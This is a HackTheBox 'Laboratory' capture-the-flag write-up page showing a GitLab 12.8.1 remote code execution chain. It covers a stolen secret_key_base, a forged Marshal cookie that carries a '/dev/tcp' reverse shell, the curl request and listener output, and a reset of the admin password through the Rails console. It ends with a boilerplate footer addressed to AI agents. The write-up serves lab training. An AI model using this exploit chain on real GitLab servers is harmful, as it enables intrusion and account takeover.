# 4 stable shell As shell is not stable, doing the process manually Following ``` It's possible to turn this into an RCE as the cookies_serializer is set to :hybrid by default. The can be done by first grabbing the secret_key_base from /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml using the arbitrary file read and then use the experimentation_subject_id cookie with a Marshalled payload. A payload can be generated by changing your own gitlab instances secret_key_base to match, then running the following in a rails console request = ActionDispatch::Request.new(Rails.application.env_config) request.env["action_dispatch.cookies_serializer"] = :marshal cookies = request.cookie_jar erb = ERB.new("<%= `echo vakzz was here > /tmp/vakzz` %>") depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new) cookies.signed[:cookie] = depr puts cookies[:cookie] Then send this cookie to the server: curl -vvv 'http://gitlab-vm.local/users/sign_in' -b "experimentation_subject_id=BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQk6DkBpbnN0YW5jZW86CEVSQgs6EEBzYWZlX2xldmVsMDoJQHNyY0kiYiNjb2Rpbmc6VVRGLTgKX2VyYm91dCA9ICsnJzsgX2VyYm91dC48PCgoIGBlY2hvIHZha3p6IHdhcyBoZXJlID4gL3RtcC92YWt6emAgKS50b19zKTsgX2VyYm91dAY6BkVGOg5AZW5jb2RpbmdJdToNRW5jb2RpbmcKVVRGLTgGOwpGOhNAZnJvemVuX3N0cmluZzA6DkBmaWxlbmFtZTA6DEBsaW5lbm9pADoMQG1ldGhvZDoLcmVzdWx0OhBAZGVwcmVjYXRvckl1Oh9BY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbgAGOwpUOglAdmFySSIMQHJlc3VsdAY7ClQ=--ef9c244a1f6b4724c1d3cbf045f8ee28a42d4b06" And it will be executed: ``` ACTION TIME: 1. GET secrets.yml (done.) 2. set up docker instance and gitlab-ce-12.8.1 running: 1. install docker () 2. Search on Dockerhub for Gitlab 3. docker pull gitlab/gitlab-ce:12.8.1-ce.0 4. docker run \ 5. docker exec -it \ bash 3. update secrets.yml with the new secret\_key\_base ``` secret_key_base: 3231f54b33e0c1ce998113c083528460153b19542a70173b4458a21e845ffa33cc45ca7486fc8ebb6b2727cc02feea4c3adbe2cc7b65003510e4031e164137b3 ``` 1. gitlab-ctl restart 2. gitlab-rails console ``` request = ActionDispatch::Request.new(Rails.application.env_config) request.env["action_dispatch.cookies_serializer"] = :marshal cookies = request.cookie_jar erb = ERB.new("<%= `bash -c 'bash -i >& /dev/tcp/10.10.14.2/6969 0>&1'` %>") depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new) cookies.signed[:cookie] = depr puts cookies[:cookie] ``` 1. puts cookies\[:cookie] ``` irb(main):008:0> puts cookies[:cookie] BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQk6DkBpbnN0YW5jZW86CEVSQgs6EEBzYWZlX2xldmVsMDoJQHNyY0kidCNjb2Rpbmc6VVRGLTgKX2VyYm91dCA9ICsnJzsgX2VyYm91dC48PCgoIGBiYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjIvNjk2OSAwPiYxJ2AgKS50b19zKTsgX2VyYm91dAY6BkVGOg5AZW5jb2RpbmdJdToNRW5jb2RpbmcKVVRGLTgGOwpGOhNAZnJvemVuX3N0cmluZzA6DkBmaWxlbmFtZTA6DEBsaW5lbm9pADoMQG1ldGhvZDoLcmVzdWx0OglAdmFySSIMQHJlc3VsdAY7ClQ6EEBkZXByZWNhdG9ySXU6H0FjdGl2ZVN1cHBvcnQ6OkRlcHJlY2F0aW9uAAY7ClQ=--36780d64605054b9179c62689eecfcaae9312854 ``` 1. curl request ``` curl -vvv -k 'https://git.laboratory.htb/users/sign_in' -b "experimentation_subject_id=BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQk6DkBpbnN0YW5jZW86CEVSQgs6EEBzYWZlX2xldmVsMDoJQHNyY0kidCNjb2Rpbmc6VVRGLTgKX2VyYm91dCA9ICsnJzsgX2VyYm91dC48PCgoIGBiYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjIvNjk2OSAwPiYxJ2AgKS50b19zKTsgX2VyYm91dAY6BkVGOg5AZW5jb2RpbmdJdToNRW5jb2RpbmcKVVRGLTgGOwpGOhNAZnJvemVuX3N0cmluZzA6DkBmaWxlbmFtZTA6DEBsaW5lbm9pADoMQG1ldGhvZDoLcmVzdWx0OglAdmFySSIMQHJlc3VsdAY7ClQ6EEBkZXByZWNhdG9ySXU6H0FjdGl2ZVN1cHBvcnQ6OkRlcHJlY2F0aW9uAAY7ClQ=--36780d64605054b9179c62689eecfcaae9312854" ``` ``` $ rlwrap nc -lvnp 6969 listening on [any] 6969 ... connect to [10.10.14.2] from (UNKNOWN) [10.10.10.216] 60472 bash: cannot set terminal process group (395): Inappropriate ioctl for device bash: no job control in this shell whoami whoami git ls -la / total 88 drwxr-xr-x 1 root root 4096 Jul 2 2020 . drwxr-xr-x 1 root root 4096 Jul 2 2020 .. -rwxr-xr-x 1 root root 0 Jul 2 2020 .dockerenv ``` ## Running deepce (docker enum) Nothing good. ``` [+] Inside Container ........ Yes [+] Container ID ............ git.laboratory.htb [+] Container Full ID ....... dd53b3f8e0735e533f500cd27f90c0e288d2fc881eda70342e59a3486d46a89c [+] Container Name .......... Could not get container name through reverse DNS [+] Container IP ............ 172.17.0.2 [+] Host IP ................. 172.17.0.1 ``` We need to elevate somehow to be be able to escape docker Using ``` gitlab-rails console -------------------------------------------------------------------------------- GitLab: 12.8.1 (d18b43a5f5a) FOSS GitLab Shell: 11.0.0 PostgreSQL: 10.12 -------------------------------------------------------------------------------- Loading production environment (Rails 6.0.2) user = User.find_by(admin: true) => # user.password = 'kashz12345' => "kashz12345" user.password_confirmation = 'kashz12345' => "kashz12345" user.save Enqueued ActionMailer::DeliveryJob (Job ID: 997c4805-654a-4ae9-a301-5e62a73d9094) to Sidekiq(mailers) with arguments: "DeviseMailer", "password_change", "deliver_now", #> => true ``` Now we can sign in to Gitlab using dexter:kashz12345 --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://kashz.gitbook.io/hackthebox-writeups/htb-boxes/laboratory/4-stable-shell.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.